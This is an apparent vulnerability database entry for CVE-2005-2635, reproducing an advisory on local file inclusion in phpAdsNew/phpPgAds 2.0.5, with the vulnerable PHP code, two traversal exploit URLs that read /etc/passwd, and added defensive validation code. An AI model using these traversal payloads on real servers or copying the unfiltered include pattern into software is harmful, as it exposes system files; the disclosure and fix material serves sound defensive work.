phpPgAds Multiple Directory Traversal Vulnerabilities

Vulnerability ID: 1198017
Vulnerability type: Path traversal
Published: 2005-08-23
Updated: 2005-10-20
CVE ID: CVE-2005-2635
CNNVD-ID: CNNVD-200508-260
Platform: N/A
CVSS score: 5.0
|Vulnerability source
https://cxsecurity.com/issue/WLB-2005090046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-260
|Vulnerability details
Multiple directory traversal vulnerabilities exist in phpAdsNew and phpPgAds versions before 2.0.6. They allow remote attackers to include arbitrary files via a .. (dot dot) sequence in (1) the layerstyle parameter passed to adlayer.php or (2) the language parameter passed to js-form.php.
|Exploit
[phpAdsNew/phpPgAds 2.0.5 Local file inclusion cXIb8O3.16]

Author: Maksymilian Arciemowicz (cXIb8O3)
from SECURITYREASON.COM TEAM

Date: 14.07.2005 (01:54 GMT+01.00)

--- 0. Description ---
phpAdsNew is an open-source ad server, with an integrated banner management interface and tracking system for gathering
statistics. With phpAdsNew you can easily rotate paid banners and your own in-house advertisements. You can even
integrate banners from third party advertising companies.

--- 1. Local file inclusion ---
Two bugs exist in phpAdsNew and phpPgAds 2.0.5. The first bug is in adlayer.php.

Code:
-151-153---
phpAds_registerGlobal ('what', 'clientid', 'clientID', 'context',
'target', 'source', 'withtext', 'withText',
'layerstyle');
-151-153---

and

-178-182---
if (!isset($layerstyle) || empty($layerstyle)) $layerstyle = 'geocities';


// Include layerstyle
require(phpAds_path.'/libraries/layerstyles/'.$layerstyle.'/layerstyle.inc.php');
-178-182---

The variable $layerstyle isn't filtered, so you can try to include a local file.


For example error:

http://[HOST]/[DIR]/adlayer.php?layerstyle=cxsecurity.com

and you can see error like this:

---
<br />
<b>Warning</b>: main(): Unable to access ./libraries/layerstyles/cxsecurity.com/layerstyle.inc.php in
<b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
<br />
<b>Warning</b>: main(./libraries/layerstyles/cxsecurity.com/layerstyle.inc.php): failed to open stream: No
such file or directory in <b>/www/phpadsnew-2.0.5/phpadsnew-2.0.5/adlayer.php</b> on line
<b>181</b><br />
<br />
<b>Fatal error</b>: main(): Failed opening required
'./libraries/layerstyles/cxsecurity.com/layerstyle.inc.php' (include_path='.:') in
<b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
---

Exploit:
http://[HOST]/[DIR]/adlayer.php?layerstyle=../../../../../../../etc/passwd%00

Magic_quotes must be OFF.

The next problem exists in ./admin/js-form.php

Code:
-26-28---
@include (phpAds_path.'/language/english/default.lang.php');
if ($HTTP_GET_VARS['language'] != 'english' &&
file_exists(phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php'))
@include (phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php');
-26-28---

And if magic_quotes_gpc = Off, you can carry out the attack.
Exploit:

http://[HOST]/[DIR]/admin/js-form.php?language=../../../../../../../../../../etc/passwd%00

But here you don't see any error, because the file_exists function is called first.

--- 3. How to fix ---

Download the new version of the script.

--- 4. Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
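
The advisory's fix is to upgrade. As an added example (not code from phpAdsNew/phpPgAds or from the advisory author), this shows one way the layerstyle value could be validated before it reaches require(); the same check applies to the language value in js-form.php. The helper name safe_component_path and the temporary demo directory are assumptions made for the example.

```php
<?php
// Added example, not phpAdsNew/phpPgAds code. safe_component_path() is a
// hypothetical helper; the temp directory below is constructed demo data.

// Map a request-supplied directory name to a file under $baseDir, or null.
function safe_component_path($baseDir, $name, $file)
{
    // 1. Allowlist: a single path segment of letters, digits, '_' or '-'.
    //    This rejects '..', '/', '\', '.', NUL bytes and empty input.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name)) {
        return null;
    }
    // 2. Canonicalise, then confirm the target is still inside $baseDir
    //    (covers symlinks that the name check cannot see).
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '/' . $file);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed tree standing in for libraries/layerstyles/.
$styles = sys_get_temp_dir() . '/lfi_demo_' . getmypid() . '/layerstyles';
mkdir($styles . '/geocities', 0700, true);
$default = $styles . '/geocities/layerstyle.inc.php';
file_put_contents($default, "<?php // constructed demo style\n");

// Values as they would arrive in $_GET['layerstyle'] after URL decoding.
$inputs = array(
    'geocities',                            // shipped default style
    'cxsecurity.com',                       // the advisory's error probe
    "../../../../../../../etc/passwd\0",    // the advisory's traversal value
    '',                                     // parameter missing or empty
);
foreach ($inputs as $value) {
    $path = safe_component_path($styles, $value, 'layerstyle.inc.php');
    // Fall back to the default style instead of passing the input to require().
    $chosen = $path !== null ? $path : realpath($default);
    printf("%-44s %s -> %s\n", json_encode($value, JSON_UNESCAPED_SLASHES),
        $path !== null ? 'accepted' : 'rejected', $chosen);
}

// Remove the demo tree.
unlink($default);
rmdir($styles . '/geocities');
rmdir($styles);
rmdir(dirname($styles));
```

Only the first input is accepted; the other three are rejected and resolve to the default style, so no request-controlled string is ever concatenated into the include path.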

|References

Source: XF
Name: phppgads-multiple-file-include(21880)
Link: http://xforce.iss.net/xforce/xfdb/21880
Source: BID
Name: 14584
Link: http://www.securityfocus.com/bid/14584
Source: BUGTRAQ
Name: 20050817 [PHPADSNEW-SA-2005-001] phpAdsNew and phpPgAds 2.0.6 fix multiple vulnerabilities
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112431497300344&w=2
Source: MISC
Link: http://www.securityreason.com/adv/phpAdsnew.SR.16.asc
Source: SECUNIA
Name: 16469
Link: http://secunia.com/advisories/16469/
